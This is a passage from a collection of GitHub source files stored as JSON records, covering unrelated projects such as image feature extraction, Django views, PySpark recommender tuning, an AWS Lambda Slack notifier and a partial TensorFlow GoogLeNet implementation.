flag is set\n if feature_params.spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=feature_params.spatial_size)\n\n #4) Append features to list\n img_features.append(spatial_features)\n\n #5) Compute histogram features if flag is set\n if feature_params.hist_feat == True:\n hist_features = color_hist(feature_image, nbins=feature_params.hist_bins)\n\n #6) Append features to list\n img_features.append(hist_features)\n\n #7) Compute HOG features if flag is set\n if feature_params.hog_feat == True:\n if feature_params.hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n feature_params.orient, feature_params.pix_per_cell, feature_params.cell_per_block, \n vis=False, feature_vec=True)) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], feature_params.orient, \n feature_params.pix_per_cell, feature_params.cell_per_block, vis=False, feature_vec=True)\n\n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n\n# Define a function to extract features from a list of images\ndef extract_features(feature_params, imgs):\n # Create a list to append feature vectors to\n features = []\n\n # Iterate through the list of images\n for file in imgs:\n # Read in image\n image = cv2.imread(file)\n\n # Get features\n features.append(single_img_features(feature_params, image))\n\n # Return list of feature vectors\n return features\n","repo_name":"gegkat/vehicle_detection","sub_path":"feature_utils.py","file_name":"feature_utils.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11403901919","text":"from django.http import JsonResponse\nfrom django.views import View\n\n\n# Create your views here.\nfrom apps.client.models import ClientTest\n\n\nclass IndexView(View):\n \"\"\"\n 客户端上传客户端号和分数\n \"\"\"\n\n def post(self, request):\n name = request.POST.get(\"name\", \"\")\n score = request.POST.get(\"score\", \"\")\n if not name or not score:\n return JsonResponse({'status': 401, 'message': '客户端名称/分数不能为空', 'data': {}})\n client = ClientTest.objects.filter(name=name).first()\n # 校验客户端是否存在\n if client:\n client.score = score\n client.save(update_fields=['score'])\n else:\n ClientTest.objects.create(name=name, score=score)\n return JsonResponse({'status': 200, 'message': 'ok', 'data': {}})\n\n\nclass ChartsView(View):\n \"\"\"\n 客户端查询排行榜\n \"\"\"\n\n def get(self, request):\n name = request.GET.get(\"name\", \"\")\n page = request.GET.get(\"page\", \"0\")\n page = int(page) if page.isdigit() else 1\n client = ClientTest.objects.filter(name=name).first()\n client_obj, result_list, data = {}, [], {}\n if client:\n obj_list = ClientTest.objects.order_by(\"score\")\n rank = 0\n for obj in obj_list:\n rank += 1\n obj_json = {\"rank\": rank, \"name\": obj.name, \"score\": obj.score}\n result_list.append(obj_json)\n if obj.name == name and obj_json:\n client_obj = obj_json\n # 分页\n if page:\n result_list = result_list[(page-1)*10: page*10]\n result_list.append(client_obj)\n data[\"result_list\"] = result_list\n else:\n return JsonResponse({'status': 401, 'message': '客户端不存在', 'data': {}})\n return JsonResponse({'status': 200, 'message': '', 'data': data})\n","repo_name":"ztf0413/demo","sub_path":"apps/client/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73562532072","text":"from rubatochat.core.chat import ChatOpenAIChat\nfrom langchain.callbacks.streaming_aiter import AsyncIteratorCallbackHandler\n_OPENAI_API_KEY = \"SECRET\"\n\nfrom langchain.schema import (\n AIMessage,\n HumanMessage,\n SystemMessage\n)\nfrom langchain.chat_models import ChatOpenAI\ndef test_base_chat():\n \n chat = ChatOpenAI(model_name=\"gpt-3.5-turbo\",temperature=0.3\n ,openai_api_key=_OPENAI_API_KEY)\n \n messages = [\n SystemMessage(content=\"You are an expert data scientist\"),\n HumanMessage(content=\"Write a Python script that trains a neural network on simulated data \")\n ]\n \n response=chat(messages)\n print(response.content,end='\\n')\n \n return None\n \ndef testChatOpenAIChat():\n \n callback = AsyncIteratorCallbackHandler()\n _chat = ChatOpenAIChat(\n streaming=True,\n openai_api_key=_OPENAI_API_KEY,\n verbose=True,\n callbacks=[callback]\n \n )\n print(_chat.question(\"hello, who are you?\"))\n \n return _chat\n\n#test_base_chat() \n_chat = testChatOpenAIChat()\n\n_response = _chat.question(\"who is beethoven, introduce him in 300 words\")\nprint(_response)\n\nimport pickle\n\n_serialized=pickle.dumps(_chat) \npickle.loads(_serialized)\n#print(_serialized)\n\n","repo_name":"appassionate/rubatochat","sub_path":"test/chat_test.py","file_name":"chat_test.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17069552783","text":"import argparse\n\nimport API.application\nimport API.device\nimport API.os\nimport API.resultsaver\nimport API.testrunner\n\n\ndef parse_arguments():\n '''\n Parse the given arguments.\n '''\n parser = argparse.ArgumentParser('Remote testrunner for microcontrollers')\n\n parser.add_argument('--app', choices=['iotjs', 'jerryscript'], default='iotjs',\n help='the target application (default: %(default)s)')\n\n parser.add_argument('--branch', metavar='name', default='master',\n help='an existing branch name for the app (default: %(default)s)')\n\n parser.add_argument('--buildtype', choices=['release', 'debug'], default='release',\n help='buildtype for the os and the app (default: %(default)s)')\n\n parser.add_argument('--commit', metavar='hash', default='HEAD',\n help='an existing hash within a branch (default: %(default)s)')\n\n parser.add_argument('--device', choices=['stm32f4dis', 'rpi2'], default='stm32f4dis',\n help='indicate the device for testing (default: %(default)s)')\n\n parser.add_argument('--address', metavar='address',\n help='address of the target device (ip or ip:port)')\n\n parser.add_argument('--os', choices=['nuttx', 'linux'], default='nuttx',\n help='the target oprating system (default: %(default)s)')\n\n parser.add_argument('--public', action='store_true', default=False,\n help='pusblish results to the web (default: %(default)s)')\n\n parser.add_argument('--timeout', metavar='sec', type=int, default=180,\n help='timeout for tests (default: %(default)s sec)')\n\n parser.add_argument('--username', metavar='nick', default='pi',\n help='User name to login to the board.')\n\n parser.add_argument('--remote-path', metavar='path', default='/',\n help='The root path of the remote testing on the device.')\n\n return parser.parse_args()\n\n\ndef main():\n '''\n Main function of the remote testrunner.\n '''\n arguments = parse_arguments()\n\n device = API.device.create(arguments.device)\n device.set_root_path(arguments.remote_path)\n device.set_username(arguments.username)\n device.set_address(arguments.address)\n device.set_timeout(arguments.timeout)\n\n app = API.application.create(arguments.app, arguments.os, device)\n app.update_repository(arguments.branch, arguments.commit)\n\n os = API.os.create(arguments.os, device, app)\n\n os.prebuild()\n app.build(arguments.buildtype)\n os.build(arguments.buildtype, 'all')\n\n device.flash(os)\n\n testrunner = API.testrunner.create(os, app, device)\n testrunner.run()\n\n resultsaver = API.resultsaver.create(\"default\", testrunner)\n resultsaver.save(arguments.public)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"tosyu/remote-testrunner","sub_path":"driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"16125997483","text":"import re\nfrom django.db.models import Q\nfrom public_project.models import Page\n\n\n#PublicDocs\ndef normalize_query(query_string,\n findterms=re.compile(r'\"([^\"]+)\"|(\\S+)').findall,\n normspace=re.compile(r'\\s{2,}').sub):\n ''' Splits the query string in invidual keywords, getting rid of unecessary spaces\n and grouping quoted words together.\n Example:\n \n >>> normalize_query(' some random words \"with quotes \" and spaces')\n ['some', 'random', 'words', 'with quotes', 'and', 'spaces']\n \n '''\n return [normspace(' ', (t[0] or t[1]).strip()) for t in findterms(query_string)] \n\n\n#PublicDocs\ndef get_query(query_string, search_fields):\n ''' Returns a query, that is a combination of Q objects. That combination\n aims to search keywords within a model by testing the given search fields.\n \n '''\n query = None # Query to search for every search term \n #terms = normalize_query(query_string)\n for term in [query_string]: # Using complete query string instead of separated terms\n or_query = None # Query to search for a given term in each field\n for field_name in search_fields:\n q = Q(**{\"%s__icontains\" % field_name: term})\n if or_query is None:\n or_query = q\n else:\n or_query = or_query | q\n if query is None:\n query = or_query\n else:\n query = query & or_query\n return query\n\n\ndef search_for_documents(query_string):\n entry_query = get_query(query_string, ['document__title', 'content',])\n found_pages = Page.objects.select_related().filter(entry_query).order_by('document','number')\n \n document_list = []\n for page in found_pages:\n if page.document not in document_list:\n page.document.search_tags = [query_string,]\n document_list.append(page.document)\n \n return document_list\n ","repo_name":"holgerd77/django-public-project","sub_path":"public_project/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1969,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"67"} +{"seq_id":"8548630705","text":"import multiprocessing\r\nimport random\r\nimport sys\r\nimport threading\r\nimport time\r\nimport continuous_threading\r\nsys.path.append(\".\")\r\nfrom channel import Channel, nodeToChannel\r\nfrom sender import Sender, sendData\r\n\r\nif __name__ == '__main__':\r\n\r\n #Initialize the Channel\r\n '<--------------------------------------------------------------------------------------->'\r\n #one common Channel\r\n carrier = Channel()\r\n '<--------------------------------------------------------------------------------------->'\r\n #create sender nodes\r\n senders = []\r\n print(\"Enter the number of senders: \")\r\n senderNodenumber = int(input())\r\n \r\n # creating n numbers of sender nodes\r\n for i in range(senderNodenumber):\r\n senders.append(Sender(i,carrier))\r\n #node1.sendData()\r\n #carrier.nodeToChannel()\r\n\r\n '<--------------------------------------------------------------------------------------->'\r\n senderToChannel , channelToSender = multiprocessing.Pipe()\r\n #receiverToChannel , channelToreceiver = multiprocessing.Pipe()\r\n '<--------------------------------------------------------------------------------------->'\r\n cq = multiprocessing.Queue()\r\n cq.put([channelToSender,carrier,senders])\r\n c = continuous_threading.ContinuousThread(target=nodeToChannel,args={cq,})\r\n \r\n senderNodes = []\r\n q = multiprocessing.Queue()\r\n for i in range(senderNodenumber):\r\n q.put([senderToChannel,senders[i],carrier])\r\n senderNodes.append(continuous_threading.ContinuousThread(target=sendData,args={q,}))\r\n \r\n \r\n for i in range(senderNodenumber):\r\n senderNodes[i].start()\r\n\r\n #start the channel\r\n c.start()\r\n \r\n\r\n\r\n\r\n\r\n","repo_name":"SonicStrain/Computer-Networks-Lab","sub_path":"A3-CSMA/p-persistent/driver.py","file_name":"driver.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"73745811094","text":"from ProyectoLab.settings import MEDIA_ROOT_DOCU\nfrom ProyectoLab.settings import MEDIA_ROOT_SAVE_COSTA_RICA\nfrom docxtpl import DocxTemplate\n\n\n\n\ndef funcion_Costa_Rica(doc_name,context):\n\n base_url = MEDIA_ROOT_DOCU \n asset_url = base_url / 'Template Prestamo COSTA RICA.docx'\n tp1 = DocxTemplate(asset_url)\n tp1.render(context)\n name = \"Guia_de_Prestamo_equipo_{}.docx\".format(doc_name)\n place_to_save = MEDIA_ROOT_SAVE_COSTA_RICA /name\n tp1.save(place_to_save)\n return place_to_save\n \n\n","repo_name":"AlexisEstela-12/CISCO-ALEYA","sub_path":"Prestamos_Costa_Rica/plantilla.py","file_name":"plantilla.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23603482010","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\n\ndef bfs(weight):\n queue = deque()\n queue.append(A)\n visited = [0] * (N + 1)\n visited[A] = 1\n\n while (queue):\n V = queue.popleft()\n\n for i, w in graph[V][1:]:\n if visited[i] == 0 and w >= weight:\n visited[i] = 1\n queue.append(i)\n\n if visited[B]:\n return True\n else:\n return False\n\n\nN, M = map(int, input().split())\n\ngraph = [[0] for _ in range(N + 1)]\n# print(graph)\n\nfor i in range(M):\n a, b, c = map(int, input().split())\n graph[a].append([b, c])\n graph[b].append([a, c])\n\n# print(graph)\n\nA, B = map(int, input().split())\n\nstart = 0\nend = 1000000000\n\nwhile (start <= end):\n mid = (start + end) // 2\n\n if bfs(mid):\n result = mid\n start = mid + 1\n\n else:\n end = mid - 1\n\nprint(result)","repo_name":"sumini0516/CodingTestStudy","sub_path":"binary_search/1939.py","file_name":"1939.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30927114540","text":"from kivy.uix.screenmanager import Screen\nfrom kivy.properties import NumericProperty, ListProperty\n\n\nclass EndScreen(Screen):\n questions_correct = ListProperty([False, False, False, False, False])\n total_correct = NumericProperty(0)\n\n def set_response_data(self, qs_correct: list):\n self.questions_correct = qs_correct\n\n self.total_correct = self.questions_correct.count(True)\n\n def on_pre_enter(self):\n two_d_labels = []\n # get all the boxes underneath the \"MDBoxLayout\" whose id is \"box_of_labels_box\"\n # add the labels which are children of those boxes to a list\n for box in self.ids.box_of_labels_box.children:\n two_d_labels.append(box.children)\n two_d_labels.reverse()\n\n question_num = 1\n for label_list in two_d_labels:\n for label in label_list:\n # CorrectResultLabel\n if label.text == \"Incorrect\":\n if self.questions_correct[question_num - 1]:\n label.text = \"Correct\"\n label.text_color = [0, 0.8, 0, 1]\n else:\n label.text = \"Incorrect\"\n label.text_color = [1, 0.2, 0.2, 1]\n # QuestionResultLabel\n else:\n label.text = f\"Question {question_num}: \"\n\n question_num += 1\n\n def on_enter(self, *args):\n progress_circle = self.ids.progress\n progress_circle.current_percent = self.total_correct\n\n # called when you exit the screen, rather than when you enter it\n def reset(self):\n self.questions_correct = [False, False, False, False, False]\n self.total_correct = 0\n\n self.ids.progress.current_percent = 0\n\n self.ids.correct1.text = \"Incorrect\"\n self.ids.correct2.text = \"Incorrect\"\n self.ids.correct3.text = \"Incorrect\"\n self.ids.correct4.text = \"Incorrect\"\n self.ids.correct5.text = \"Incorrect\"\n","repo_name":"ojas-sanghi/FBLA-Quiz","sub_path":"kivy_code/end.py","file_name":"end.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34000907670","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author: chaomy\n# @Date: 2017-07-10 08:37:35\n# @Last Modified by: chaomy\n# @Last Modified time: 2018-07-23 15:22:50\n\nimport numpy as np\nfrom numpy import cos, sin, pi\nfrom . import gn_dd_data_dat as dddat\n\n\nclass gn_dd_prec(object):\n\n def __init__(self):\n self.cell = np.ndarray([3, 2])\n self.precs = None\n self.precfile = '{}.dat'.format(self.job)\n return\n\n def inplane_hcp_beta1_prec(self):\n self.ddata.precn = 30\n self.set_cell()\n self.set_prec()\n fid = self.write_precip_header()\n self.write_precip_data(fid)\n return\n\n def set_prec_strain(self):\n strain = np.zeros(6)\n return strain\n\n def set_prec_rotate(self, angle=(0., 0., 0.)):\n # check http://mathworld.wolfram.com/EulerAngles.html\n (phi, theta, psi) = angle[0], angle[1], angle[2]\n D = np.mat([[cos(phi), sin(phi), 0.],\n [-sin(phi), cos(phi), 0.],\n [0., 0., 1.]])\n C = np.mat([[1., 0., 0.],\n [0., cos(theta), sin(theta)],\n [0., -sin(theta), cos(theta)]])\n B = np.mat([[cos(psi), sin(psi), 0.],\n [-sin(psi), cos(psi), 0.],\n [0., 0., 1.]])\n A = B * C * D\n return A\n\n def set_prec_size(self): #\n lens = np.array([100, 5, 200]) * np.random.rand(3)\n size = np.array([300, 30, 800]) + lens\n return size\n\n def set_prec_coords(self):\n cell = self.ddata.cell\n pos = np.zeros(3)\n size = cell[:, 1] - cell[:, 0]\n pos = cell[:, 0] + size * np.random.rand(3)\n # along the (x, y, 0) plane\n pos[2] = 0.0\n return pos\n\n def set_prec(self):\n self.precs = []\n for i in range(self.ddata.precn):\n prec = dddat.prec()\n prec.precid = i + 1\n prec.coords = self.set_prec_coords()\n prec.dimaxi = self.set_prec_size()\n if i % 3 == 0:\n prec.rotate = self.set_prec_rotate((pi / 3., 0., 0.))\n elif i % 3 == 1:\n prec.rotate = self.set_prec_rotate((-pi / 3., 0., 0.))\n elif i % 3 == 2:\n prec.rotate = self.set_prec_rotate((0., 0., 0.))\n prec.strain = self.set_prec_strain()\n print(\"coord\", prec.coords)\n print(\"size\", prec.dimaxi)\n self.precs.append(prec)\n return\n\n def write_precip_header(self):\n fid = open(self.precfile, 'w')\n fid.write(dddat.precfile_header)\n return fid\n\n def write_precip_data(self, fid):\n # strformat = '{} ' + '{:7.6f} ' * (3 * 6) + '\\n'\n strformat = '{} ' + '{:4.3f} ' * 6\n strformat += '{:6.5f} ' * 6\n strformat += '{:2.1f} ' * 6\n strformat += '\\n'\n for prec in self.precs:\n line = strformat.format(\n prec.precid,\n prec.coords[0], prec.coords[1], prec.coords[2],\n prec.dimaxi[0], prec.dimaxi[1], prec.dimaxi[2],\n prec.rotate[0, 0], prec.rotate[0, 1],\n prec.rotate[0, 2], prec.rotate[1, 0],\n prec.rotate[1, 1], prec.rotate[1, 2],\n prec.strain[0], prec.strain[1],\n prec.strain[2], prec.strain[3],\n prec.strain[4], prec.strain[5])\n fid.write(line)\n fid.close()\n return\n","repo_name":"chaomy/Config_generate","sub_path":"gn_dd_prec_hcp.py","file_name":"gn_dd_prec_hcp.py","file_ext":"py","file_size_in_byte":3441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4487067020","text":"N, T = map(int, input().split())\r\nmaxN, minN = N*2, 1\r\ncnt = 0\r\nflag = True\r\nfor _ in range(T):\r\n if flag:\r\n cnt += 1\r\n else:\r\n cnt -= 1\r\n if flag and cnt >= maxN:\r\n flag = False\r\n elif not flag and cnt <= minN:\r\n flag = True\r\nprint(cnt)","repo_name":"SSH1007/Algorithm","sub_path":"백준/Bronze/17944. 퐁당퐁당 1/퐁당퐁당 1.py","file_name":"퐁당퐁당 1.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"9640843400","text":"from itertools import product\nfrom program import Program\n\nwith open(\"data/input.txt\", 'r') as f:\n data = f.readline()\n\ndata = [int(d) for d in data.split(\",\")]\n\nprog = Program(data, 12, 2)\nprog.process()\n\nprint(\"=== PART A ===\")\nprint(prog.get_output())\n\n#===============================================================================\n\nprint(\"=== PART B ===\")\ndesired_output = 19690720\nfor noun, verb in product(range(100), range(100)):\n prog = Program(data, noun, verb)\n prog.process()\n if prog.get_output() == desired_output:\n print(\"FOUND IT!!!\")\n print(f\"Noun = {noun}\")\n print(f\"Verb = {verb}\")\n print(f\"Soln = {100*noun + verb}\")\n","repo_name":"timbook/advent-of-code-2019","sub_path":"02-day/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30428915851","text":"from __future__ import print_function\nfrom scitbx import matrix\n\n\ndef read_expt(filename):\n from dials.phil import ExperimentListConverters\n from dials.util.options import flatten_experiments\n\n converter = ExperimentListConverters(check_format=False)\n return flatten_experiments([converter.from_string(filename)])\n\n\ndef write_expt(experiments, filename):\n from dxtbx.model.experiment_list import ExperimentListDumper\n\n dump = ExperimentListDumper(experiments)\n dump.as_json(filename)\n\n\nimport sys\n\nexpts = read_expt(sys.argv[1])\nexpt = expts[0]\n\nscan = expt.scan\ngonio = expt.goniometer\n\nassert len(expt.detector) == 1\n\n# crud trying to work out correct min two theta\n\np = expt.detector[0]\n\ndims = p.get_image_size()\npixel = p.get_pixel_size()\n\nsize = tuple([_d * _p for _d, _p in zip(dims, pixel)])\nfast = matrix.col(p.get_fast_axis())\nslow = matrix.col(p.get_slow_axis())\norigin = matrix.col(p.get_origin())\n\ns0n = matrix.col(expt.beam.get_s0()).normalize()\npanel, xy = expt.detector.get_ray_intersection(s0n)\nzero = origin + xy[0] * fast + xy[1] * slow\n\nresolution = expt.detector.get_max_inscribed_resolution(expt.beam.get_s0())\nimport math\n\n# this is wrong https://github.com/dials/dials/issues/348\n# however right enough for this...\n\ntheta = math.asin(expt.beam.get_wavelength() / (2 * resolution))\nprint(\"Using two-theta: %.3f\" % (2 * theta * 180.0 / math.pi))\n\nepochs = scan.get_epochs()\nexposure_times = scan.get_exposure_times()\nimage_range = scan.get_image_range()\noscillation = scan.get_oscillation()\n\ncurrent = 1 + image_range[1] - image_range[0]\nturn = int(round(360.0 / oscillation[1]))\nextra = turn - current\n\nfor j in range(extra):\n epochs.append(0.0)\n exposure_times.append(0.0)\n\nimage_range = image_range[0], image_range[1] + extra\n\nscan.set_image_range(image_range)\nscan.set_epochs(epochs)\nscan.set_exposure_times(exposure_times)\n\nwrite_expt(expts, sys.argv[2])\n\n# now for amusement try decomposing rotation of 90 degrees about beam to\n# measure blind region - computer says no if mini kappa :(\n\ne1 = matrix.col((1, 0, 0))\ne2 = matrix.col((0.914, 0.279, -0.297))\ne3 = matrix.col((1, 0, 0))\n\nR = matrix.sqr((0, 1, 0, -1, 0, 0, 0, 0, 1))\n\nfrom dials.algorithms.refinement import rotation_decomposition\n\nsolutions = rotation_decomposition.solve_r3_rotation_for_angles_given_axes(\n R, e1, e2, e3, return_both_solutions=True, deg=True\n)\n\nassert solutions is None\n\n# now try getting a rotation of two-theta about the beam - this should (i)\n# be possible? and (ii) move the blind region into somewhere we can actually\n# record...\n\nR_tt = s0n.axis_and_angle_as_r3_rotation_matrix(2 * theta)\n\ns = rotation_decomposition.solve_r3_rotation_for_angles_given_axes(\n R_tt, e1, e2, e3, return_both_solutions=False, deg=False\n)\n\n# use solution\n\nprint(\"Using angles: %.3f %.3f\" % (180 * s[1] / math.pi, 180 * s[2] / math.pi))\n\nF = e2.axis_and_angle_as_r3_rotation_matrix(\n s[1]\n) * e3.axis_and_angle_as_r3_rotation_matrix(s[2])\n\ngonio.set_fixed_rotation(F.elems)\nwrite_expt(expts, sys.argv[3])\n","repo_name":"dials/dials_scratch","sub_path":"gw/mod_experiments.py","file_name":"mod_experiments.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13304330045","text":"#!/usr/bin/env python\n\n# imports\nimport pandas as pd\nimport numpy as np\nimport spark_helpers\n\n# pyspark modeling\nfrom pyspark.ml.feature import VectorAssembler\nfrom pyspark.ml.pipeline import Pipeline\nfrom pyspark.ml.recommendation import ALS, ALSModel\nfrom pyspark.ml.evaluation import RegressionEvaluator\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nimport pyspark as ps\nspark = ps.sql.SparkSession.builder \\\n .getOrCreate()\n\nsc = spark.sparkContext\n\ndef main():\n sc.setCheckpointDir('checkpoint/')\n ab3 = pd.read_pickle('ab6.pkl')\n spark_abpu_reviews = spark.createDataFrame(ab3)\n spark_abpu_reviews_clean = spark_abpu_reviews.drop(\n \"date\", \"title\", \"review_text\", \"source_id\", \"username\",\n \"review_id\", \"vote_count\", \"vote_sum\", \"customer_type\",\n \"date\", \"data_source\", \"podcast_id\", \"user_id\"\n )\n spark_abpu_training, spark_abpu_test = (\n spark_abpu_reviews_clean.randomSplit([0.8, 0.2])\n )\n tuningALS = ALS(userCol=\"spark_id\", itemCol=\"spark_pid\", ratingCol=\"rating\",\n coldStartStrategy=\"drop\", nonnegative=True,\n checkpointInterval=2, maxIter=40)\n #ranktuning = np.linspace(20,85,13, endpoint=False)\n #regtuning = np.linspace(0.22, 0.29, 15, endpoint = False)\n ranktuning = np.linspace(20,40,10, endpoint=False)\n regtuning = np.linspace(0.23, 0.28, 10, endpoint = False)\n paramGrid = ParamGridBuilder() \\\n .addGrid(tuningALS.rank, ranktuning) \\\n .addGrid(tuningALS.regParam, regtuning) \\\n .build()\n crossval = CrossValidator(estimator=tuningALS,\n estimatorParamMaps=paramGrid,\n evaluator=RegressionEvaluator(metricName=\"rmse\", labelCol=\"rating\",\n predictionCol=\"prediction\"), numFolds=5)\n cv_model = crossval.fit(spark_abpu_training)\n cv_info_dict = spark_helpers.get_CV_info(cv_model)\n spark_helpers.param_writer(cv_info_dict, \"param_tuning_results.txt\")\n spark_helpers.spark_model_saver(cv_model, \"best_model.sparkmodel\")\n\nif __name__==\"__main__\":\n main()\n","repo_name":"brettasmi/podrex","sub_path":"als_cv.py","file_name":"als_cv.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"23739079601","text":"import json\nimport boto3\nimport requests\nimport os\n\n\njs = \"\"\"\n{\n \"source\": [\n \"aws.ec2\"\n ],\n \"detail-type\": [\n \"EC2 Instance State-change Notification\"\n ],\n \"detail\": {\n \"state\": [\n \"stopping\"\n ],\n \"instance-id\": [\n \"\"\n ]\n }\n}\n\"\"\"\n\ncw_events = boto3.client('events')\nec2 = boto3.resource('ec2')\n\nSLACK_WEBHOOK_URL = os.environ['SLACK_WEBHOOK_URL']\n\ndef lambda_handler(event, context):\n instance_id = event['detail']['instance-id']\n instance = ec2.Instance(instance_id)\n iid = ''.join(instance_id)\n mid = ''.join(instance.image_id)\n ejs={}\n ejs = json.loads(js)\n \n ejs['detail']['instance-id'] = [event['detail']['instance-id']]\n\n name = \"stopping-instance-\" + ''.join(instance_id)\n response = instance.create_tags(Tags=[{'Key': 'Ami', 'Value': instance.image_id}])\n response = cw_events.put_rule(\n Name=name,\n RoleArn='arn:aws:iam::534756183248:role/service-role/py-instance-ami-role-3m0yi8b0',\n EventPattern=json.dumps(ejs),\n State='ENABLED')\n pt_response = cw_events.put_targets(\n Rule=name,\n Targets=[\n {\n 'Id': \"1\",\n 'Arn': \"arn:aws:lambda:us-east-2:534756183248:function:Stopping-Instace\",\n },\n ]\n )\n \n sr_arn = ''.join(response['RuleArn'])\n data = { \"text\": \"Instance with image_id \" + mid + \" has started with stopt-rule ARN \" + sr_arn }\n response = requests.post(SLACK_WEBHOOK_URL, json=data, headers={'Content-Type': 'application/json'})\n","repo_name":"misterme00/aws-lamda","sub_path":"lamda_funtion.py","file_name":"lamda_funtion.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42563941703","text":"''' This is an implementation of a research paper called \"Going deeper with convolutions\" which discussed\n the idea of Inception V1 Architecture''' \n''' The paper could be found here \"https://arxiv.org/abs/1409.4842\" '''\n\n'''The architecture of GoogleNet is consist mainly from four classes which are: \n 1-Convolutional Blocks\n 2- Auxiliary Blocks\n 3-Inception Blocks\n 4- The main GoogleNet '''\n\n''' The network is 22 layers deep when counting only layers with parameters (or 27 layers if we also count pooling).\n The overall number of layers (independent building blocks) used for the construction of the network is about \n 100'''\n'''I will implement GoogleNet by using Tensorflow subcalssing'''\n\n'''I will start by importing the main packages that i need'''\n\nimport tensorflow as tf\nfrom tensorflow import keras\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n#tf.test.is_gpu_available(\n # cuda_only=False, min_cuda_compute_capability=None\n#)\n\n\n'''Now, i will implement the first class which is the Convolutional Block. As written in the paper, each Convolutional_Block consist of\n1- Convolutional.\n2- BatchNormalization layer.\n3- Activation (ReLu) layer.\n This class takes as arguments:\n1-input_channels \n2- out_channels \n3- convolutional_filters. \n4-stride.\n5-padding. '''\n\nclass Convolutional_Block(keras.layers.Layer):\n def __init__(self, \n input_channels, \n output_channels, \n convolutional_filters, \n stride, \n padding,\n name='2D convolution layer'):\n super(Convolutional_Block, self).__init__(name = name)\n self.convolution_2D_layer=tf.keras.layers.Conv2D(input_channels, output_channels, convolutional_filters, stride, padding)\n self.BatchNormalization=tf.keras.layers.BatchNormalization(output_channels)\n self.activation_layer=tf.nn.relu()\n\n def call(self,input):\n \"\"\"Calls the Convolutional_Block\n on the given inputs.\"\"\"\n input=self.convolution_2D_layer(input)\n input=self.BatchNormalization(input)\n input=self.activation_layer(input) \n return input\n\n\n# Let us implement the auxiliary classifiers as mentioned in the paper \n'''By adding auxiliary classifiers connected to these intermediate layers, we would expect to encourage \n discrimination in the lower stages in the classifier, increase the gradient signal that gets propagated\n back, and provide additional regularization. These classifiers take the form of smaller convolutional \n networks put on top of the output of the Inception (4a) and (4d) modules. During training, their loss\n gets added to the total loss of the network with a discount weight (the losses of the auxiliary classifiers\n were weighted by 0.3). At inference time, these auxiliary networks are discarded. The exact structure of\n the extra network on the side, including the auxiliary classifier, is as follows:\n 1- An average pooling layer with 5*5 filter size and stride 3, resulting in an 4*4*512 output\n for the (4a), and 4*4*528 for the (4d) stage.\n 2- A 1*1 convolution with 128 filters for dimension reduction and rectified linear activation.\n 3- A fully connected layer with 1024 units and rectified linear activation.\n 4- A dropout layer with 70% ratio of dropped outputs.\n 5- A linear layer with softmax loss as the classifier (predicting the same 1000 classes as the\n main classifier, but removed at inference time). ''' \n\nclass Auxiliary_Block(keras.layers.Layer):\n def __init__(self, input_channels, number_classes):\n super(self,Auxiliary_Block).__init__()\n\n self.Adaptive_Avg_Pool2d = tf.nn.AdaptiveAvgPool2d((4, 4))\n self.convolution_2D_layer = tf.nn.Conv2d(input_channels, 128, convolutional_filters=1, stride=1, padding=0)\n self.activation_layer = tf.nn.ReLU()\n\n self.fully_conn_1 = tf.nn.Linear(2048, 1024)\n self.dropout = tf.nn.Dropout(0.7)\n self.fully_conn_2 = tf.nn.Linear(1024, number_classes)\n\n def call(self, input):\n output = self.Adaptive_Avg_Pool2d(input)\n\n output = self.convolution_2D_layer(output)\n output = self.activation_layer(output)\n print('out shape is ', output.shape)\n # out shape is torch.Size([2, 128, 4, 4])\n\n output = tf.keras.layers.Flatten(output, 1)\n\n output = self.fully_conn_1(output)\n output = self.activation_layer(output)\n output = self.dropout(output)\n\n output = self.fully_conn_2(output)\n\n return output\n\n\n\n'''Now i will implement the Inception Block.\nFrom the paper: \n\nAs these “Inception modules” are 